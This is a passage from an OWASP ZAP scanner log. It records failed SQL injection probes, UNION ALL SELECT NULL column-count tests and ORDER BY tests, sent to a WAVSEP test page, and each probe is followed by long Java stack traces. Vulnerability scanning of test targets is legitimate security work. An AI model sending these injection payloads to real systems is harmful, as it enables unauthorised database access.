org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679450 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679452 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679452 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679454 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679454 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679455 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679456 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679456 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679457 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679458 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679459 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 9261-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' ORDER BY 9261-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at 